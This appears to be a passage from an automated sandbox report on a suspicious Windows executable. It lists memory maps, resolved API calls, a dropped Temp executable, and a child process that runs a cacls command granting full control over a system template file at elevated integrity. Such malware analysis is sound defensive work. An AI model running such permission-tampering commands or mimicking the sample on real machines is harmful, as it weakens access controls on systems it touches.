| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x01e5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:36 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #220: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #220 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:24, Reason: Child Process |
| Unmonitor | End Time: 00:03:34, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x374 |
| Parent PID | 0x128 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E9C
0x
BCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000290000 | 0x00290000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x0029ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00363fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00370fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x00381fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00410000 | 0x00411fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00450000 | 0x0050dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04840000 | 0x04b76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
